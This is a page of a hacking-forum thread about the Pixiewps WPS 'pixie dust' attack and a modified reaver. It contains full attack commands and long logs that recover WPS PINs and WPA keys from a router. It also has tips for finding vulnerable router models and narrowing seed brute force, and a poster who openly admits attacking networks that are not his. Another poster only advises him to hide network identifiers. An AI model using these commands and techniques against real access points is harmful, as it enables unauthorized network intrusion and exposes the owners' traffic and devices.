Page 5 of 5 FirstFirst 12345
Results 201 to 244 of 244

Thread: Pixiewps: wps pixie dust attack tool

  1. #201
    Join Date
    2013-Jul
    Location
    United States
    Posts
    519
    Good example kcdtv. Thanks

  2. #202
    Join Date
    2015-Mar
    Posts
    141
    That's a good little write-up kcdtv, very informative :-)

  3. #203
    Join Date
    2015-Mar
    Location
    Morocco
    Posts
    8
    thank you so much for you explanation kcdtv i got it now

  4. #204
    Join Date
    2013-Sep
    Posts
    262
    I realize now that there is a little trick that can be used to identify vulnerable routers very fast.
    It seems that the default ssid with this realteck SoC (RTL819X project) is.... the router model.
    My totolink N301 RT has got for default ssid TOTOLINK N301RT
    Than i checked the default ssid for another device that have the same SDK, the Prolink PRN3001A.
    The default SSID also gives straightforward the model in this case :

    What about TrendNet TEW-638AP?
    They have emulator online so that fast to check :

    Conclusion : if you see the model name in the essid and that pixiewps suggest you to try again in brute force mode because it has a rtl819x you should use the options start and end focusing from end 2011 to end 2012/beginning 2013 when this kind of devices where launched.
    I had a look to firmwares versions for this models and i didn't see any new firmware released after 2014 for this kind of devices.
    So i am pretty sure that at least by adding --start 2014 you will find the PIN and gain some time as you won't brute force from 2016 to 2014.
    This devices are not old but they are already at the end of their cicle of production since some years.
    It means that manufacturer does not provide new version of firmware and the last "build time" that is used as a seed in DH exchange is the date of the version of one of he firmware available.

    Other trick, if you see an image in one manual or checking with google, the layout for the web interface with this realtek SDK can give you a cue (if manufacturer didn't change it all)
    An image is worth than explanation ...
    Do you have an impression of déjà-vu?

  5. #205
    Join Date
    2016-Jan
    Posts
    4
    Quote Originally Posted by soxrok2212 View Post
    Did you install the new reaver? Check out the YouTube video. You don't need wire shark at all.
    i was not able to find the youtube video for the new reaver could u pls pm me the link i would appreciate it.

  6. #206
    Join Date
    2015-Mar
    Posts
    141
    Quote Originally Posted by Necony286 View Post
    i was not able to find the youtube video for the new reaver could u pls pm me the link i would appreciate it.
    A) Can't post youtube links in this forum.
    B) Can't PM in this forum.

  7. #207
    Join Date
    2013-Jul
    Location
    United States
    Posts
    519
    Any new video for this on youtube will feature the new reaver/bully. Just search it.

  8. #208
    Join Date
    2016-Jan
    Location
    Montreal, CA
    Posts
    12
    Very informative thread but I must say it's a little confusing to me as i'm relatively new to kali and i'm on a Nexus 7 2013 which doesn't really make things simple.
    Kali does come with pixiewps and reaver but not the latest versions, nor the mod. I believe i effed something up while I was tryin to git clone both of these as I no longer have pixiewps (neither normally from bash or from the supposed install folder /usr/local/bin), wonder if this will require the whole flash stock/flash kali etc etc...
    Also I'm running a TP-Link TL-WN722N and when I try to airmon-ng start wlan1mon ... the TP-Link flashes but nothing actually shows up, unlike in @kcdtv's post on the previous page. I can stop it fine and I can pick up networks when I run wifite

    Any pointers? I know it sounds rather vague... I'm just looking for general to detailed resources/articles if you happen to know some or actually written some yourselves..
    thanks

  9. #209
    Join Date
    2016-Feb
    Posts
    4
    Kali 2.0 Live with new Reaver and Pixie-Dust returns 2 solutions for same AP 1 minute later in every attempt.
    Why would this happen ?

    DATA:

    BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

    xx:xx:xx:xx:xx:xx -75 399 0 0 11 54e WPA2 CCMP PSK yyy_zzzzzzzz_123456

    BSSID STATION PWR Rate Lost Frames Probe


    root@kali:~# reaver -i wlan0 -b xx:xx:xx:xx:xx:xx -K 1

    Reaver v1.5.2 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212

    [+] Waiting for beacon from xx:xx:xx:xx:xx:xx
    [+] Associated with xx:xx:xx:xx:xx:xx (ESSID: yyy_zzzzzzzz_123456)
    [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
    [P] E-Nonce: 42:5c:96:08:58:07:cc:83:cf:d5:c8:32:23:d0:17:20
    [P] PKE: ca:ac:0a:6f:4f:6b:f9:0c:d0:4a:82:2c:0c:47:f0:cc:cd :97:fb:5e:f0:3c:9c:bc:28:93:17:d8:ea:3b:19:c5:ef:9 0:9d:57:41:30:1f:03:5c:b7:4f:23:14:dc:39:2b:27:ea: 83:50:eb:56:90:43:bb:de:0e:e7:2d:49:47:89:88:ab:ea :c7:f1:bb:fc:7b:fd:21:aa:41:0a:08:8f:70:35:69:86:9 c:c4:48:f9:6f:a7:1f:2d:ce:b5:44:17:18:40:f9:22:f4: c1:e1:38:83:cd:3c:51:41:54:26:c4:36:2c:79:ce:ea:89 :67:ca:b8:44:99:e1:df:45:50:ef:a9:7a:3e:d7:90:e1:c f:af:f9:6b:82:4b:ad:61:f6:6d:63:ec:e1:cc:b6:dd:e0: 2e:5e:3b:f6:80:fc:26:e4:e2:d0:52:33:bf:fa:02:a8:27 :f1:82:b6:5a:4a:33:9d:a8:07:b9:f2:52:8f:ec:ab:52:a 5:b7:7d:3a:6a:1f:6b:30:2f
    [P] WPS Manufacturer: Ralink Technology, Corp.
    [P] WPS Model Name: Ralink Wireless Access Point
    [P] WPS Model Number: RT2860
    [P] Access Point Serial Number: 12345678
    [P] R-Nonce: 91:b0:15:9d:19:e6:11:a1:a2:c1:b4:5a:b4:7d:53:14
    [P] PKR: 34:ef:cc:3d:69:6c:68:22:35:b3:88:b0:2f:57:c1:c2:54 :fb:08:53:70:d9:2f:ed:a2:9d:f5:83:ce:12:7f:11:c4:3 f:42:61:9b:db:65:b7:b2:4e:8a:04:92:9d:fd:9b:02:ee: ed:8f:d9:c3:84:28:d3:ec:aa:a9:0a:8c:06:75:0b:97:6e :f3:5d:db:a2:28:32:84:c9:99:b8:3c:7a:c4:92:ff:03:3 7:13:6c:f5:0f:d4:30:0f:80:0a:45:0d:9a:10:b8:54:ee: b5:1b:83:47:91:2f:a9:7d:b7:a2:16:1e:95:06:01:00:f6 :1e:4e:1e:40:33:59:f9:0e:04:3c:35:0c:21:b8:e3:62:f e:81:14:7c:ad:c7:08:5e:62:9d:4a:a3:07:e6:69:1f:a7: bb:f4:f9:5f:ed:76:42:73:2e:a9:28:5f:41:64:89:61:ff :b0:18:f6:22:a9:8c:81:18:3c:07:e8:9a:65:a6:ac:9a:d 3:23:eb:10:62:a2:d4:27:98
    [P] AuthKey: b4:06:48:58:73:26:c6:5d:dd:13:c7:56:ce:71:ff:ef:de :48:51:4e:78:57:29:25:7f:40:b0:42:19:94:19:8e
    [P] E-Hash1: 77:a5:51:89:2c:1b:e3:ef:b0:f2:8d:04:80:e9:25:1f:28 :34:a1:a2:0b:3c:bd:8f:c0:22:d7:e4:1f:7f:5e:34
    [P] E-Hash2: 30:75:c2:fe:29:c0:bc:6d:d4:1a:d1:54:15:21:33:ac:23 :44:f1:4e:3a:35:31:ce:0f:c7:10:58:fa:34:8c:aa
    [Pixie-Dust]
    [Pixie-Dust] Pixiewps 1.1
    [Pixie-Dust]
    [Pixie-Dust][*] E-S1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
    [Pixie-Dust][*] E-S2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
    [Pixie-Dust] [+] WPS pin: 10427880
    [Pixie-Dust]
    [Pixie-Dust][*] Time taken: 0 s
    [Pixie-Dust]
    Running reaver with the correct pin, wait ...
    Cmd : reaver -i wlan0 -b xx:xx:xx:xx:xx:xx -c 11 -s y -vv -p 10427880

    [Reaver Test] BSSID: xx:xx:xx:xx:xx:xx
    [Reaver Test] Channel: 11
    [Reaver Test] [+] WPS PIN: '10427880'
    [Reaver Test] [+] WPA PSK: 'dc7bc520883f02b6e784772ae7340cda5c85c8b2d9f389e55 5a014277034ec16'
    [Reaver Test] [+] AP SSID: 'yyy_zzzzzzzz_123456'
    root@kali:~#



    NEXT 1 MINUTE LATER

    Reaver v1.5.2 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212

    [+] Waiting for beacon from xx:xx:xx:xx:xx:xx
    [+] Associated with xx:xx:xx:xx:xx:xx (ESSID: yyy_zzzzzzzzz_123456)
    [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
    [P] E-Nonce: 42:5c:96:08:58:07:cc:83:cf:d5:c8:32:23:d0:17:20
    [P] PKE: 29:2a:f4:1a:a8:68:ea:00:7f:e4:e3:a2:56:30:9c:86:11 :75:8d:e8:cf:f0:d5:42:fb:f7:84:06:9b:00:9c:a2:63:4 7:e4:9f:05:d8:a7:c9:4f:b1:63:4c:69:6f:9d:38:18:b9: 2e:ee:4d:a6:74:ad:8a:d3:c9:05:a2:74:b5:e9:6b:7e:86 :10:0f:7c:28:54:cd:d8:3c:19:4a:2a:6c:f7:b3:ac:bd:6 6:09:c1:86:43:18:be:f0:cb:24:f9:1f:cc:7b:21:ef:97: 46:a3:50:77:83:5f:90:f0:81:5d:77:0a:cf:d4:ec:ee:97 :db:90:ce:36:a1:3c:1e:ac:63:31:f8:ec:ef:1a:d1:51:1 a:9f:c8:4b:2f:fe:8f:f9:c2:23:6c:f3:e6:27:2e:a2:d4: 0d:fa:f3:cd:fe:4a:85:0b:89:86:1f:cd:20:1c:a1:90:cc :44:a4:d7:00:81:75:51:1c:9c:e1:f6:14:b5:cc:d9:11:e 9:fd:80:bc:86:cb:61:52:de
    [P] WPS Manufacturer: Ralink Technology, Corp.
    [P] WPS Model Name: Ralink Wireless Access Point
    [P] WPS Model Number: RT2860
    [P] Access Point Serial Number: 12345678
    [P] R-Nonce: 9f:8c:14:96:8c:11:b1:23:ad:c1:6b:8a:04:1a:e5:7c
    [P] PKR: af:1b:86:49:f5:32:dc:9f:6b:77:fd:b8:70:3f:02:27:0e :80:ce:f4:f3:29:8c:85:6e:d1:87:21:ad:7a:27:37:b0:4 f:b7:27:36:bb:dc:0c:08:94:40:c6:56:0c:3b:91:41:71: bd:d2:74:3f:ea:39:cc:33:f4:be:c3:22:19:6d:b7:f5:ae :8b:16:ae:a0:0c:33:c3:a5:39:85:34:42:af:db:2d:00:5 8:09:01:53:bf:c5:f8:db:57:89:d3:73:eb:db:f6:06:3d: 0a:95:0a:a0:d2:08:ab:8c:2c:16:77:26:8d:9a:6f:0f:03 :9a:aa:2b:69:10:8e:e1:38:09:8f:05:6a:2a:f4:a6:ed:a 8:d7:c6:9d:f1:6b:b5:bf:ed:47:9d:4d:67:35:9d:a9:93: aa:e9:83:fc:30:93:8c:17:1c:4d:27:6f:00:b5:ad:09:3c :e7:76:38:9c:d3:b2:d3:37:bb:1a:00:4a:8b:e0:d5:79:e 2:86:c4:a6:7b:21:94:1e:ba
    [P] AuthKey: ff:91:1a:65:26:a1:81:a4:2b:d3:f5:39:2d:e7:b8:5d:09 :29:56:fd:3f:7b:ca:01:ac:60:fc:66:5a:3a:2b:93
    [P] E-Nonce: 42:5c:96:08:58:07:cc:83:cf:d5:c8:32:23:d0:17:20
    [P] PKE: 49:da:96:93:49:b0:a9:71:4a:82:5c:9b:9a:e3:cc:39:04 :f1:9c:08:9e:2c:de:a1:e5:1e:c6:79:6b:2c:84:88:b7:4 f:0c:c8:6a:b5:07:7b:2c:d6:1b:5b:f7:66:be:90:53:3b: ea:b2:a6:95:5a:26:d6:81:ee:92:dd:5c:e6:da:c4:55:c9 :9b:88:9f:27:16:a6:d8:8d:35:7c:46:45:14:65:21:94:2 f:c8:44:5a:47:31:12:60:9b:53:54:df:ae:b8:36:4a:44: 39:74:6e:18:6c:32:e1:f7:ab:e8:c8:46:d2:67:41:2d:2f :e1:77:a5:ea:4e:63:2e:54:ba:41:c6:58:f3:4c:df:9c:c c:9c:0f:a8:48:17:be:e7:a3:b4:2a:e7:a4:d9:0a:3a:b6: f6:f5:04:0b:b1:f6:e5:d9:5a:88:c8:7e:da:0a:90:d1:08 :74:61:47:23:b1:05:b2:e6:83:76:07:fe:06:38:5c:c9:1 b:21:ee:1a:fd:88:28:ea:41
    [P] WPS Manufacturer: Ralink Technology, Corp.
    [P] WPS Model Name: Ralink Wireless Access Point
    [P] WPS Model Number: RT2860
    [P] Access Point Serial Number: 12345678
    [P] R-Nonce: b9:a2:80:a8:97:75:b9:10:c4:1a:fe:d2:f9:97:59:0a
    [P] PKR: e9:10:a8:1a:a5:cd:21:9a:67:93:0d:ee:2a:a8:30:87:6f :80:e8:32:b3:62:c4:cb:a3:2d:72:fc:66:ab:93:ea:24:b c:d0:b1:29:1c:b6:cb:fa:dc:76:ab:77:99:9d:ae:da:91: 02:d6:de:fe:e6:1a:86:c4:dc:c9:31:3d:08:07:5f:07:84 :41:77:15:2f:74:75:fb:62:46:e8:c8:94:c4:28:c1:63:a 3:07:2b:46:30:1e:11:e2:c2:c0:4d:61:ca:32:7d:23:6f: 88:07:aa:da:95:29:77:6d:7d:28:da:56:0d:a6:fa:57:81 :7f:cb:df:bf:8c:07:bd:74:88:f5:16:51:48:08:83:ab:5 f:71:8c:c4:53:dc:b0:36:85:ab:ea:1b:97:0d:a8:38:50: 55:7f:89:73:23:e1:0f:d7:ba:ad:0c:8e:77:3e:ab:1f:c0 :73:9e:d1:5e:57:46:52:61:f2:6c:f6:e2:44:2d:ec:2c:b 3:6a:d4:84:c1:67:b3:a5:ea
    [P] AuthKey: e4:a5:f2:82:31:25:aa:e0:5b:cb:7b:09:4e:91:b7:46:28 :95:8a:ae:d7:55:4a:52:87:38:87:d0:d4:f0:6d:0d
    [P] E-Nonce: 42:5c:96:08:58:07:cc:83:cf:d5:c8:32:23:d0:17:20
    [P] PKE: 2b:d9:be:8f:b9:9f:53:4f:30:2e:e7:b0:e0:e8:0f:21:3b :94:44:73:c4:70:ed:d0:24:45:57:e9:74:10:38:63:10:7 e:26:7d:57:3b:38:3d:f7:e1:c6:40:09:a4:cd:c1:46:5d: e1:60:97:aa:ca:a1:24:c6:ca:fa:38:5a:9c:56:65:18:2e :14:35:11:26:17:0a:d9:40:04:7b:99:dc:0f:90:5d:63:4 d:09:4c:85:19:8c:9e:19:a8:48:85:97:7f:ae:7c:a0:29: fa:12:d2:fb:0c:b3:30:2d:46:61:fa:2d:d9:5f:9d:ee:9d :6e:1d:b6:1d:08:4c:64:f7:1f:3a:b7:cb:54:f4:03:b0:6 0:94:c2:cb:b4:e5:d7:2f:71:1b:ae:57:c8:60:c5:dd:a1: c9:82:31:81:70:af:45:97:67:21:d3:d2:4f:1e:f2:81:48 :14:8d:67:be:58:f7:3d:ff:ed:e2:fc:50:8a:f7:ef:e1:0 0:9a:9a:9b:0e:b6:a4:f5:80
    [P] WPS Manufacturer: Ralink Technology, Corp.
    [P] WPS Model Name: Ralink Wireless Access Point
    [P] WPS Model Number: RT2860
    [P] Access Point Serial Number: 12345678
    [P] R-Nonce: 47:b8:f7:80:fc:31:5b:a7:c7:58:6f:40:30:68:a9:04
    [P] PKR: 4b:85:25:b3:7e:61:dc:a6:c6:d3:c2:45:5d:90:3a:cb:b0 :53:37:94:02:dd:29:17:68:04:1d:3b:3a:6a:1a:40:ca:c 1:8b:22:e8:4b:ae:f6:08:d8:a7:a3:6c:1b:29:ea:ec:95: 1d:ed:19:56:89:15:f0:0f:8f:74:73:dd:ba:27:0b:ea:0b :bd:54:36:24:57:40:25:be:15:e1:a8:9a:24:d8:10:04:2 5:66:f3:01:f7:b1:84:51:b3:7d:cc:a7:3c:e4:c8:4c:d9: 4e:52:77:2c:61:3a:d0:ed:dc:b3:e0:31:17:77:5e:e7:9c :51:9a:93:e2:09:bc:cf:f1:d2:d6:91:5c:e0:07:ec:34:1 b:77:89:47:ec:f2:65:88:97:65:de:74:2f:0b:69:6b:44: 20:f9:d1:b3:ab:07:c9:e7:4d:e0:21:a2:01:b9:1a:33:e9 :b6:5b:78:ee:b4:46:62:7c:70:06:d0:43:57:d1:04:76:d 9:e6:64:1b:d6:50:3a:27:31
    [P] AuthKey: 5f:c8:ce:60:82:fe:54:52:5d:d3:88:0a:5f:45:68:77:78 :60:23:1d:f6:59:82:74:61:cd:bc:0f:96:e9:36:7a
    [P] E-Hash1: 5e:6f:2d:98:5c:81:ab:8e:46:21:76:99:b0:be:81:98:0f :25:88:ae:ee:c0:24:67:49:23:c4:4d:01:f7:d2:a7
    [P] E-Hash2: a3:1a:25:b2:34:75:46:b4:3a:a8:df:12:7e:01:44:e5:d3 :6e:66:1e:73:81:bd:4a:5e:f4:2d:fe:46:12:19:80
    [Pixie-Dust]
    [Pixie-Dust] Pixiewps 1.1
    [Pixie-Dust]
    [Pixie-Dust][*] E-S1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
    [Pixie-Dust][*] E-S2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
    [Pixie-Dust] [+] WPS pin: 10427880
    [Pixie-Dust]
    [Pixie-Dust][*] Time taken: 0 s
    [Pixie-Dust]
    Running reaver with the correct pin, wait ...
    Cmd : reaver -i wlan0 -b xx:xx:xx:xx:xx:xx -c 11 -s y -vv -p 10427880

    [Reaver Test] BSSID: xx:xx:xx:xx:xx:xx
    [Reaver Test] Channel: 11
    [Reaver Test] [+] WPS PIN: '10427880'
    [Reaver Test] [+] WPA PSK: 'd717380be0f1784ca16d3fc559d1a62a5e53a549cc061eb98 e708c2019e01ca0'
    [Reaver Test] [+] AP SSID: 'yyy_zzzzzzzzz_123456'
    root@kali:~#

  10. #210
    Join Date
    2013-Jul
    Location
    United States
    Posts
    519
    Pretty sure it is a hash of the actual password. Try with Bully: https://github.com/aanarchyy/bully

  11. #211

    PRNG brute force

    can any one explain -f option in pixie wps and details about PRNG ... steps involved in PRNG attack including command .. also inform whether linksys E 900 is vulnerable to attack ??

  12. #212
    Join Date
    2016-Mar
    Posts
    2
    Quote Originally Posted by shrinivas murthi View Post
    can any one explain -f option in pixie wps and details about PRNG ... steps involved in PRNG attack including command .. also inform whether linksys E 900 is vulnerable to attack ??
    Write in terminal pixiewps -e PKE -r PKR -s e-hash1 -z e-hash2 -a authkey -n e-nonce -f
    PKE/PKR/E-HASH1+2/Authkey and e-nonce are written in your reaver attack on specified BSSID

  13. #213
    Join Date
    2016-Feb
    Posts
    4

    Clarification and additional information

    I dunno
    Same result with bully and 7 of 8 of the pin numbers.
    This is not a crisis.
    I thought there may be some magic code in the AP or filter when another mac associated with it.
    It looked like a randomly generated 64 bit hex password.
    Thanks for the reply
    If youl like, I can post the Bully log data.

    Let me clarify my two posts using Reaver and Bully.
    I am unable to connect to this AP with the first password solution.
    So, I used Reaver with Pixiedust 1 minute apart to glean information.
    There is no connect when I turn around and use my other desktop with the copied PSK on a USB.
    I provided the log to show the changing (the 64 hex number) answers.
    The pin number is always the same.
    Reaver has worked in about 5 cases and I can connect with those routers.
    There has been about 30 cases when the pin is not found or the association fails.
    I may have wrongly posted the Reaver log in a different thread.
    I don't think posting the Bully log will provide more helpful information.
    Last edited by helen2016; 2016-03-09 at 03:48. Reason: Clarification

  14. #214
    Join Date
    2015-Apr
    Posts
    29
    Quote Originally Posted by helen2016 View Post
    If youl like, I can post the Bully log data .
    Yes, please

  15. #215
    Join Date
    2013-Sep
    Posts
    262
    It looked like a randomly generated 64 bit hex password.
    That's the PMK

  16. #216
    Join Date
    2015-Mar
    Posts
    141
    Yeah, you can use the 64 bit password hash just fine.

  17. #217
    Join Date
    2016-Feb
    Posts
    4
    Reply to "Try with Bully" probably posted in wrong thread.
    The results were the same, changing PSK and no connect.
    The pin number is always the same.
    My last attempt was copy and transfer the 64 PSK from laptop to desktop using TMAC V6 to spoof the client MAC obtained from airodump-ng.
    Still unable to connect, but I can see the process starting and failing.
    My wireless knowledge and coding ability combined with stumbling terminal syntex is far too low to go any further.
    Thanks for the relies and comments.

  18. #218
    Join Date
    2013-Jul
    Location
    United States
    Posts
    519
    Hm, my last consideration would either be that your wireless card is bad(which I doubt since it seems to handle reaver and bully ok up to the point of receiving the PSK) or the router does not have WPS configured (or in any event, configured properly).

  19. #219
    Join Date
    2016-Mar
    Posts
    1
    First of all thanks to all the developers who have worked on this project.
    Now to help helen2016 about psk.
    You will need an android device.
    P.s. Rooted device will be better.
    Go to wifi settings.
    Tap on essid. You will see a pop up to enter password. Tick advanced option. You will see Wps and dropdown box saying off. Tap on it and select pin from access point enter your Wps pin.
    In less than two minutes you will be connected if Wps pin is correct and Wps is active on AP.
    Now u can navigate to /data/misc/wifi/
    Open wpa_supplicant.conf as text
    And you can see acquired password.
    Give it a try

  20. #220
    Join Date
    2013-Sep
    Posts
    262
    @ alkesh
    You do not need and android device : any GNU-Linux distribution (kali itslef) can connect with a WPS PIN using wpa_cli from wpa_supplicant
    @ Helen
    You can connect with the PMK entered directly, at least with a GNU-Linux distribution (i don't know or use windows) .
    Don't forget to remove the "two points"...
    The passphrase is not used directly in WPA protocol, it is just for human, what is used is the PMK that you can calculate like this :
    PMK = PBKDF2(HMAC−SHA1, passphrase, ssid, 4096, 256)
    A string is created wiith the passphrase and ssid lenght, it is then passed 4096 times through SHA-1 hash function and you keep the 256 first bytes (64 hex characters) to get your PMK
    It looks like a classical distance issue
    Get closer to your router
    And this "problem" doesn't have to do with pixiewps as the PIN is generated.
    You can check the PIN on the sticker under your router
    cheers

  21. #221
    Join Date
    2013-Jul
    Location
    United States
    Posts
    519
    kcdtv is right, you don't need an Android. Any linux distribution should do.

  22. #222
    Join Date
    2016-Apr
    Posts
    10

    Hello. RT2860

    Hi,

    Please, I'm trying to test Ralink RT2860 but it constanly gives me a error "wps transaction failed (0x04)" and I can't get m3 or m4 messages.

    How can I get e-hashes out of this?

  23. #223
    Join Date
    2016-Apr
    Posts
    10
    Quote Originally Posted by t6_x View Post
    Finally able to create my account in this forum

    I already emailed the wiire on the tests I've done.

    First of all I made a modified version of reaver to facilitate the tests, this modification is already do a pixie test when a pin is tested on reaver

    [P] E-Nonce: 41: f2: 8c: 82: 53: 3b: df: ........
    [P] PKE: 6b: 0e: 22: cb: cd: 21: ........
    [P] WPS Manufacturer: Ralink Technology, Corp.
    [P] WPS Model Number: RT2860
    [+] Received message M1
    [P] AuthKey: f7: fb: bc: 21: ab: 3b: 99: 70: 36: 8e: f1: a0: ........
    [+] Sending message M2
    [P] E-Hash1: 1e: d6: 12: 27: 8f: 12: 28: 21: 9a: 54: .........
    [P] E-Hash2: d: f: 34: and: ac: 55: a4: 9e: b3: 95: 31: 7a: 61: b0: ........
    [Pixie-Dust]
    [Pixie-Dust][*] ES-1: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00
    [Pixie-Dust][*] ES-2: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00
    [Pixie Dust-][*] PSK1: 76: 46: 96: c7: 5d: e4: 8a: 86: .......
    [Pixie-Dust][*] PSK2: 1b: 5e: 3e: 6b: 19: 89: 4b: 5c: .......
    [Pixie-Dust] [+] WPS pin: 41368541
    [Pixie-Dust]
    [Pixie-Dust][*] Time taken: 0 s
    [Pixie-Dust]
    [+] Received message M3
    [+] Sending message M4

    If someone want this version, tell me



    Now with relation to the TP-Link.

    I believe it may be vulnerable to another type of problem.

    I have a TP-Link 740N v1, is a very old router, think it 2004-2005


    It has the Atheros chipset, Linux runs and uses the hostap together with the / dev / random.

    But this firmware version for example has a problem in the generation of random numbers, it may be that this firmware version is with this problem.

    The seed for generating the random number is based on the date (date, time, seconds) router

    Every time I restart the modem, the seed to generate the random number is the same. So it is possible to make bruteforce on all dates, hours, seconds to find the current state of the seed. This makes it possible to generate future seeds to make bruteforce the pin.


    It may be that this problem is only in this firmware version, do not have other routers to test or compare and without having them in the hands is difficult to make the tests.

    But this problem certainly is present in many other models of routers.


    Today I met a router where the E-Hash1 and the E-Hash2 was identical and there needed to make a modification in pixie for him to do the bruteforce correctly.

    I will continue to develop and when I have more news come back to post.

    Sorry for the English, I used a translator
    Hello,

    I'm trying to test Ralink RT2860 (exactly same as the example above) but it constantly gives me an error "WPS transaction failed (0x04)" and I can't get any m3, m4 messages or e-hashes. Please, any solutions?
    Last edited by whitetsagan; 2016-04-13 at 08:55.

  24. #224
    Join Date
    2016-Jan
    Posts
    99
    it may be the distance, obstacles, many factors. what airodump shows on the pwr and rqx of that ap?

  25. #225
    Join Date
    2016-Apr
    Posts
    10
    The power is between -65 to -70. I also tried to test one by sitting just right next to it. I don't think it has anything with obstacle and stuff. Router is from Huawei. And reaver says:

    [P] WPS Manufacturer: Ralink Technology, Corp.
    [P] WPS Model Name: Ralink Wireless Access Point
    [P] WPS Model Number: RT2860

    Wash indicates that WPS is not locked. Super confused. Please, help?
    Last edited by whitetsagan; 2016-04-13 at 15:43.

  26. #226
    Join Date
    2016-Apr
    Posts
    10
    Please, anyone?

  27. #227
    Join Date
    2016-Apr
    Posts
    1
    It does nothing but keeps authenticating for hours. The authentication process is always successful but at the end it creates another authentication process and so on.

    Did anyone has that kind of problem with pixiewps?

  28. #228
    Join Date
    2013-Jul
    Location
    United States
    Posts
    519
    Maybe WPS is enabled but not configured.

  29. #229
    Join Date
    2016-Apr
    Posts
    10
    Quote Originally Posted by soxrok2212 View Post
    Maybe WPS is enabled but not configured.
    Does that mean it is a no go?

  30. #230
    Join Date
    2016-Jan
    Posts
    99
    post what "airodump-ng wlan0mon --wps" gives. as soxrox said, it may not be configured

  31. #231
    Join Date
    2016-Apr
    Posts
    10
    Quote Originally Posted by bob79 View Post
    post what "airodump-ng wlan0mon --wps" gives. as soxrox said, it may not be configured
    Thanks. .
    Last edited by whitetsagan; 2016-04-29 at 15:59.

  32. #232
    Join Date
    2013-Sep
    Posts
    262
    you should edit your pictures (it doesn't look like you are testing your network )
    anyway your problem is not a pixiewps issues : getting the hashes is one thing handled by others programs (and you can do it yourself by having a look to your capture file) pixiewps is "just" about using this hashes to get the PIN.
    Last edited by kcdtv; 2016-04-28 at 20:02.

  33. #233
    Join Date
    2016-Apr
    Posts
    10
    Brother, haha. Let's be honest, you, me, we all know we are not trying to get reaver/pixie working just to mess with our own network. FYI, I have got one exactly as same as this network, just not at the moment, which throws same error. Trust me one this one. :P But even though I have my own, I don't have access to the network config though.

    I am well aware of that it is not about pixie. It's about reaver. Reason why I am here is nobody there to give proper answer in other discussions. And I tend to see experts who are modifying reaver prowl around here. So please share what you know about this. Have I been honest enough? I pretty much think so. :P

  34. #234
    Join Date
    2013-Sep
    Posts
    262
    Brother, haha. Let's be honest, you, me, we all know we are not trying to get reaver/pixie working just to mess with our own network.
    bro', i am not judging you or telling you what to do or not.
    My point of view is not moral, i am not administrator or moderator of this forum and i really don't care about what you do at your home, that's not my business and i am not a cop, **** no!
    The point is that if you are not in good conditions with a real knowledge about the configuration of the access point ... if you get "error code 04 wps transaction failed" or something like this there could be so much reasons... from interferences made by other clients associated to the RXQ you get, you don't even know if WPS is properly enabled,
    So "experts" will tell you to get closer to access point, to disconnect all devices when you make your test, to rise delay between PIN...
    I can give you an example : Spanish livebox 2.1 will let you send a PIN just if you are very very close to the access point with delay 5 and will handle one PIN out 5, It is not a defense mechanism or something like that, just the way wps is implemented (badly)
    while you could PIN brute force fast as **** other devices in bad conditions that would not even allow you to reach 1MBpS when you connect to them in the same conditions...
    So if yo are on "spanish livebox 2.1" kind of router, there is nothing yo can do, no bug, and nothing to tell you... when i see this default ssid i imagine one of this crappy "box" with so little range that i can easily imagine why you cannot "reaver" it if you are more than 10 meters away from the device..
    Anyway, you are not giving enough elements to answer you... scan with airodmp-ng should be done with --bssid filter and --channel filter, we should see the output of your probes to get info about the device, we should get an exact stdout of what is going on with reaver.
    Reason why I am here is nobody there to give proper answer in other discussions.
    If this topic is about pixiewps : Do you think it is respectful for wiire who made this tool for all of us to use his thread to ask whatever yo want? If everybody does like you, what would be the result?
    Have I been honest enough? I pretty much think so. :P
    You know .. be honnest with your girl (or boy), be honest with your bro' and mum...but with the rest.. be clever.
    Saying in a public forum that you are "hacking" network and uploading pictures with full bssid and essid of this networks is not clever.
    That why i recommend you to "edit" your pictures by erasing the end of bssid and essid... because doing like yo do is like declaring to the whole world "here i am! Check this macs and essid; i live 25 meters aways!"
    Well, my point is: Please, reconsider the way you act in this thread, i think it is a shame to "deviate" it and this forum is full of shity and useless themes that you could use to ask questions. But the work from wiire and this thread is without any doubt one of the best and more usefull in this whole forum, please, respect it and help to respect it.
    take care

  35. #235
    Join Date
    2016-Apr
    Posts
    10
    Quote Originally Posted by t6_x View Post
    Finally able to create my account in this forum

    [P] E-Nonce: 41: f2: 8c: 82: 53: 3b: df: ........
    [P] PKE: 6b: 0e: 22: cb: cd: 21: ........
    [P] WPS Manufacturer: Ralink Technology, Corp.
    [P] WPS Model Number: RT2860
    [+] Received message M1
    [P] AuthKey: f7: fb: bc: 21: ab: 3b: 99: 70: 36: 8e: f1: a0: ........
    [+] Sending message M2
    [P] E-Hash1: 1e: d6: 12: 27: 8f: 12: 28: 21: 9a: 54: .........
    [P] E-Hash2: d: f: 34: and: ac: 55: a4: 9e: b3: 95: 31: 7a: 61: b0: ........
    [Pixie-Dust]
    [Pixie-Dust][*] ES-1: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00
    [Pixie-Dust][*] ES-2: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00
    [Pixie Dust-][*] PSK1: 76: 46: 96: c7: 5d: e4: 8a: 86: .......
    [Pixie-Dust][*] PSK2: 1b: 5e: 3e: 6b: 19: 89: 4b: 5c: .......
    [Pixie-Dust] [+] WPS pin: 41368541
    [Pixie-Dust]
    [Pixie-Dust][*] Time taken: 0 s
    [Pixie-Dust]
    [+] Received message M3
    [+] Sending message M4

    If someone want this version, tell me
